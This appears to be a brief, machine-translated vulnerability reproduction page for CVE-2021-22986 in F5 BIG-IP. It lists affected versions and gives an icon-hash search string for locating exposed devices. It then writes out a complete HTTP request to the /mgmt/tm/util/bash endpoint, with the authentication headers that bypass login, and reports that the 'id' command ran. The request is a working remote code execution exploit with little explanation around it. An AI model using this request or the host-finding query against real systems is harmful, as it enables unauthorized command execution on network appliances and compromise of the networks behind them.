F5 Big Ip Remote Code Execution Vulnerability Cve 2021 22986

F5 BIG-IP Remote Code Execution Vulnerability CVE-2021-22986

Vulnerability Description

F5 BIG-IP is an application delivery platform of F5 companies in the United States that integrates network traffic management, application security management, load balancing and other functions.

Recently, F5 released the F5 BIG-IQ/F5 BIG-IP code execution, risk statement for code execution, and the F5 security announcement updated BIG-IP, and several serious vulnerabilities in BIG-IQ.

Vulnerability Impact

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

Network surveying and mapping

icon_hash=”-335242539”

Vulnerability reappears

Visit the login page as follows

Send a request packet

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

Successfully executed command id